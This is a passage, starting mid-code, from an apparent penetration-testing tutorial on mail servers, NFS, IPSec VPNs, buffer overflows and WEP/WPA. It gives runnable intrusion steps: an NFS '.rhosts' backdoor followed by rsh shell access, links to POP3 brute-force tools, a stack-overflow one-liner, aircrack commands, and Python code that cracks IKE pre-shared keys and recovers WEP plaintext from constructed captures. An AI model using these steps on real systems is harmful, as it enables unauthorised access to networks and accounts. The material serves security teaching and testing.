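S: 250 mail.companyxyz.com
C: VRFY accounting
S: 252 Cannot VRFY user
C: EXPN root
S: 502 EXPN not implemented
C: MAIL FROM: test@test.com
S: 250 OK
C: RCPT TO: anything@anything.com
S: 554 Relay access denied
C: QUIT
S: 221 Bye
"""


def parse_transcript(text):
    """Pair each client command with the numeric reply code that follows it."""
    pairs, pending = [], None
    for line in text.strip().splitlines():
        tag, _, body = line.partition(": ")
        if tag == "C":
            pending = body
        elif tag == "S" and pending is not None:
            pairs.append((pending, int(body[:3])))
            pending = None
    return pairs


def _address_domain(cmd):
    """Domain part of the first user@host in a MAIL FROM / RCPT TO command, lower-cased."""
    m = re.search(r"([^\s<>:]+)@([^\s<>]+)", cmd)
    return m.group(2).lower() if m else None


def _is_local(domain, local_domain):
    ld = local_domain.lower()
    return domain == ld or domain.endswith("." + ld)


def assess_relay(transcript, local_domain):
    """Return findings on account verification and relaying for the server's own domain."""
    findings = {"vrfy_enabled": False, "expn_enabled": False, "relay_accepted": False}
    mail_from_external = False
    for cmd, code in parse_transcript(transcript):
        verb = cmd.split()[0].upper()
        if verb in ("VRFY", "EXPN") and code in (250, 251):
            # 252 is "cannot verify but will try to deliver": not a confirmation
            findings[verb.lower() + "_enabled"] = True
        elif verb == "MAIL":
            dom = _address_domain(cmd)
            mail_from_external = dom is not None and not _is_local(dom, local_domain)
        elif verb == "RCPT":
            dom = _address_domain(cmd)
            if mail_from_external and dom and not _is_local(dom, local_domain) and 200 <= code < 300:
                findings["relay_accepted"] = True  # foreign sender to foreign recipient accepted
    return findings


if __name__ == "__main__":
    print(assess_relay(OPEN_RELAY_SESSION, "companyxyz.com"))
    print(assess_relay(HARDENED_SESSION, "companyxyz.com"))
```

Relaying is only counted when both envelope addresses are outside the local domain: a 250 to a local recipient is normal inbound delivery, and a local sender to a foreign recipient is what the company's own users legitimately do from inside the network.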

POP3
To connect to a POP3 mail server:
telnet mail.companyxyz.com 110
USER Michael@companyxyz.com
PASS password
Once in, read mails:
RETR 1 (where 1 is the number of the mail on the POP3 server)
DELE 1 (would delete mail number 1)
Brute-force tools for POP3 mail servers:
http://packetstormsecurity.org/groups/ADM/ADM-pop.c
http://packetstormsecurity.org/Crackers/Pop_crack.tar.gz
http://packetstormsecurity.org/groups/Crackers/hv-pop3crack.pl

IMAP
Brute-force tools for IMAP mail servers: http://www.hoobie.net/brutus

Exploits
Once you have obtained the server's version, search for exploits in vulnerability databases (see Tools & Links section).

Unix Operating Systems

Industry in particular has widely deployed servers based on Linux, Unix and Solaris.

UNIX RPC
These services are Unix daemons such as NIS+, NFS and CDE. Enumerating Unix RPC services with the tools "rpcinfo" and "nmap":
rpcinfo -p 192.168.1.1
nmap -sR 192.168.1.1
This will reveal port information and the state of the services.

NFS

Improperly configured NFS (Network File System) exports might allow direct host access through the “mount” command:
showmount –e 192.168.1.1
mount 192.168.1.1:/home /mnt
cd /mnt
ls –la
Change directory into a discovered home directory:
cd anythingdiscovered
echo + + > .rhosts
cd /
umount /mnt
This works when the export is writable and you can create the file as the directory owner’s UID (create a local user with the same UID if necessary); “+ +” in .rhosts trusts every user from every host, so rsh then needs no password. Finally connect through remote shell:
rsh –l anythingdiscovered 192.168.1.1 csh –i
For compromising a Solaris host as above, use the rootdown tool as follows:
perl rootdown.pl –h 192.168.1.1 –i
echo + + > /usr/bin/.rhosts
rsh –l bin 192.168.1.1 csh –i
(/usr/bin is the home directory of the “bin” account on Solaris.)

Exploits

Once you have obtained the server’s version, search for exploits in vulnerability databases (see Tools & Links section).

Virtual Private Networks (VPNs)

VPN PSK-Cracking

IPSec services are gaining popularity in the industry. Many companies form VPNs between their offices in order to transmit data encrypted and secure across the Internet. Unfortunately many security flaws exist in VPN deployments, and it is often possible to discover the PSK (Pre-Shared Key) of a VPN gateway.
Enumerate VPNs with the tools “ipsecscan” and “ike-scan”.

They may discover active VPNs:
ipsecscan 192.168.1.1 192.168.1.10 (all hosts from .1 to .10)
ike-scan --showbackoff 192.168.1.1

IKE phase 1 has two modes (Main Mode and Aggressive Mode). A gateway running aggressive mode answers a single initiator request with its identity and an authentication hash (HASH_R) that is derived from the PSK and sent unencrypted. That hash can be sniffed and then cracked offline by dictionary or brute force, because every other input to it was exchanged in the clear. The tool “ikeprobe” is used in conjunction with “Cain & Abel” as follows:
ikeprobe 192.168.1.1
At the same time Cain & Abel must run on the same machine to capture the hashes, which are then cracked to obtain the PSK. In main mode the hash is sent encrypted, so this attack does not apply there.

Checkpoint

Some implementations of Checkpoint Firewalls have vulnerabilities which can reveal valid VPN usernames. The tool is “fw-ike-userguess”:
fw-ike-userguess –file=testusers.txt –sport=0 192.168.1.1
Another tool is SensePost’s “sr.pl”. It can be used to glean network information from Checkpoint Firewalls:
perl sr.pl firewall.companyxyz.com

Exploits

Once you have obtained the server’s version, search for exploits in vulnerability databases (see Tools & Links section).

Applications

Buffer Overflow

To keep it simple: applications keep their data in memory regions (heap, stack etc.) while they run. If more input is written into a fixed-size buffer than it can hold, the adjacent data, for example a saved return address, is overwritten. The application may then crash (Denial of Service), or, if the overwritten return address points into attacker-supplied code, that code is executed instead of the legitimate code (unauthorized access).
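The offline PSK cracking that the VPN PSK-Cracking section above describes, as an added Python example that is not part of the original page and not the code of ike-scan, ikeprobe or Cain & Abel. It computes HASH_R exactly as RFC 2409 defines it for pre-shared-key authentication (prf = HMAC with the negotiated hash) and recovers the PSK from a wordlist. Because no real traffic is captured here, make_capture() fabricates the cleartext values of an aggressive-mode exchange; the nonces, Diffie-Hellman public values, cookies, SA payload body and the PSK “companyxyz” are all constructed.

```python
import hashlib
import hmac
import os


def ike_prf(hash_name, key, data):
    """IKEv1 prf: HMAC with the negotiated hash ("md5" or "sha1")."""
    return hmac.new(key, data, hash_name).digest()


def hash_r(hash_name, psk, ni, nr, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b):
    """HASH_R for pre-shared-key authentication (RFC 2409 section 5.4):
       SKEYID = prf(psk, Ni_b | Nr_b)
       HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)"""
    skeyid = ike_prf(hash_name, psk, ni + nr)
    return ike_prf(hash_name, skeyid, g_xr + g_xi + cky_r + cky_i + sai_b + idir_b)


def make_capture(psk, hash_name="sha1"):
    """Constructed stand-in for a sniffed aggressive-mode exchange (not real traffic).

    In aggressive mode every value below except the PSK travels in the clear: the
    initiator (the tester, when ikeprobe is used) chose Ni, g^xi, CKY-I and the SA
    proposal; the responder answered with Nr, g^xr, CKY-R, IDir and HASH_R in one
    unencrypted message."""
    cap = {
        "hash": hash_name,
        "ni": os.urandom(20), "nr": os.urandom(20),
        "g_xi": os.urandom(128), "g_xr": os.urandom(128),   # DH group 2 public values
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),
        # SAi_b: body of the initiator's SA payload; arbitrary bytes stand in for it
        "sai_b": bytes.fromhex("00000001000000010000002801010001"),
        # IDir_b: ID type 1 (IPV4_ADDR), protocol 0, port 0, then the gateway address
        "idir_b": bytes([1, 0, 0, 0]) + bytes([192, 168, 1, 1]),
    }
    cap["hash_r"] = hash_r(hash_name, psk, cap["ni"], cap["nr"], cap["g_xr"], cap["g_xi"],
                           cap["cky_r"], cap["cky_i"], cap["sai_b"], cap["idir_b"])
    return cap


def crack_psk(cap, candidates):
    """Offline dictionary attack: recompute HASH_R per candidate PSK and compare.
    No further packets to the gateway are needed. Returns the PSK or None."""
    for word in candidates:
        guess = hash_r(cap["hash"], word.encode(), cap["ni"], cap["nr"], cap["g_xr"],
                       cap["g_xi"], cap["cky_r"], cap["cky_i"], cap["sai_b"], cap["idir_b"])
        if guess == cap["hash_r"]:
            return word
    return None


if __name__ == "__main__":
    capture = make_capture(b"companyxyz", "sha1")
    wordlist = ["password", "cisco", "vpn", "companyxyz", "secret"]
    print("recovered PSK:", crack_psk(capture, wordlist))
```

With a real capture the inputs must be taken byte for byte from the packets: SAi_b is the initiator's SA payload without its generic payload header, IDir_b is the responder's ID payload body, and the hash function is whichever the accepted transform negotiated (MD5 or SHA-1). ike-scan's psk-crack and Cain & Abel do that extraction for you; the arithmetic is the same as above.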

One program to demonstrate this is “printme.c”, which has to be downloaded and compiled:
cc –o printme printme.c
Test:
./printme Test
Sample of a stack overflow, where perl is used to generate the oversized argument (a NOP sled followed by the address to jump to):
./printme `perl –e ‘print “\x90\x90\x90\ (filled with 32 fields) \xbf”.’`
With the tool “gdb” you can watch where the program crashes and which bytes of the input ended up in the instruction pointer.

Exploits

Once you have obtained the server’s version, search for exploits in vulnerability databases (see Tools & Links section).

Wireless LAN

WEP

WEP (Wired Equivalent Privacy) enabled WLANs are very widespread and it is very easy to crack the WEP key. To assess a Wireless LAN protected with a WEP key, you’ll need a laptop with a wireless card that supports packet injection (such as an Atheros-chipset card or the Orinoco Gold) and the “Auditor” or “Backtrack” security CD (see tools section).

Howto (note: change interface names accordingly).
Use “Kismet” to scan for the target AP and write down the BSSID (MAC address) of the target AP.
Create a temporary directory:
mkdir wepcrack
cd wepcrack/

Configure your WLAN card:
ifconfig eth0 up
iwconfig eth0 mode monitor
airodump eth0 tocrack
New window:
cd wepcrack
aireplay -i eth0
Look for a packet whose BSSID MAC matches the target AP. Do NOT pick packets with DST FF:FF:FF:FF:FF:FF. Answer “No” to all other packets and “Yes” when the presented packet matches the BSSID MAC of the AP. This ARP packet will now be used for re-injection (WEP=1), which makes the AP produce a steady stream of new IVs.
Once you have around 500 000 IVs captured, stop airodump.
New window:
cd wepcrack
aircrack -q 3 -f 2 tocrack.cap
DONE
Once you have the key, associate with the AP using this key.
http://www.remote-exploit.org

WPA

Wi-Fi Protected Access (WPA) is a newer security standard for Wireless LANs; its enterprise variant authenticates users through 802.1X, while WPA-PSK relies on a pre-shared key and is vulnerable to dictionary attacks if a weak key is used. The attack is offline: a captured four-way handshake between a client and the AP is enough to test candidate passphrases without further contact with the AP. WPACrack is a tool available with the Auditor Security CD. It cracks weak keys by deriving the key material from each dictionary word and comparing the result against the captured handshake.

Exploits

Once you have obtained the server’s version, search for exploits in vulnerability databases (see Tools & Links section).
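The WEP procedure above collects hundreds of thousands of IVs and replays ARP packets because of a design flaw that the following added Python example makes concrete. It is not part of the original page and it is not the statistical (FMS/KoreK) attack that aircrack runs; it implements RC4 and WEP framing as the standard defines them and shows that two frames encrypted under the same 24-bit IV share one keystream, so a known plaintext (the fixed LLC/SNAP header every ARP frame starts with) reveals the other frame's contents without the key. The IV space is only 2^24, so with random IVs a repeat is expected after a few thousand frames. The 40-bit key, the IV and the two frames are constructed, not captured.

```python
import struct
import zlib


def rc4(key, length):
    """RC4 keystream of `length` bytes for `key` (KSA followed by PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _icv(data):
    """WEP integrity check value: CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(wep_key, iv, plaintext):
    """WEP frame body: IV(3) | key id(1) | RC4(IV||key) applied to plaintext||ICV.
    The per-packet RC4 key is the 24-bit IV prepended to the 40- or 104-bit WEP key."""
    assert len(iv) == 3
    data = plaintext + _icv(plaintext)
    ks = rc4(iv + wep_key, len(data))
    return iv + b"\x00" + bytes(a ^ b for a, b in zip(data, ks))


def wep_decrypt(wep_key, frame):
    """Inverse of wep_encrypt; raises ValueError if the ICV does not check out."""
    iv, body = frame[:3], frame[4:]
    data = bytes(a ^ b for a, b in zip(body, rc4(iv + wep_key, len(body))))
    plaintext, icv = data[:-4], data[-4:]
    if _icv(plaintext) != icv:
        raise ValueError("ICV mismatch: wrong key or corrupted frame")
    return plaintext


# LLC/SNAP header that starts every ARP frame on an 802.11 network. Its
# predictability is why aireplay replays ARP packets: known plaintext, and a
# reply carrying a fresh IV for every injected request.
ARP_SNAP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"
IP_SNAP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"


def recover_with_reused_iv(frame_a, frame_b, known_plaintext_a):
    """Two frames under the same IV share one RC4 keystream, so
    C_a ^ C_b == P_a ^ P_b: whatever is known of P_a reveals P_b, key or no key."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames use different IVs; their keystreams are unrelated")
    c_a, c_b = frame_a[4:], frame_b[4:]
    n = min(len(known_plaintext_a), len(c_a), len(c_b))
    return bytes(c_a[i] ^ c_b[i] ^ known_plaintext_a[i] for i in range(n))


def demo():
    """Constructed frames (not a capture): a 40-bit key and one IV used twice."""
    wep_key = bytes.fromhex("0123456789")                               # constructed key
    iv = b"\x01\x02\x03"
    arp = ARP_SNAP + b"\x00\x01\x08\x00\x06\x04\x00\x01" + bytes(20)   # ARP request shape
    ip = IP_SNAP + b"\x45\x00\x00\x2c" + bytes(40)                     # start of an IPv4 packet
    f_arp = wep_encrypt(wep_key, iv, arp)
    f_ip = wep_encrypt(wep_key, iv, ip)
    # Knowing only that f_arp carries ARP, recover the start of the other frame.
    return recover_with_reused_iv(f_arp, f_ip, arp[:8])


if __name__ == "__main__":
    print("recovered without the key:", demo().hex())
```

The same keystream reuse is what lets aireplay keep injecting a captured ARP request it cannot read, and the weak-IV statistics that aircrack exploits are a second consequence of prepending a public IV to the secret key; WPA/WPA2 fixed both by deriving per-packet keys properly.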
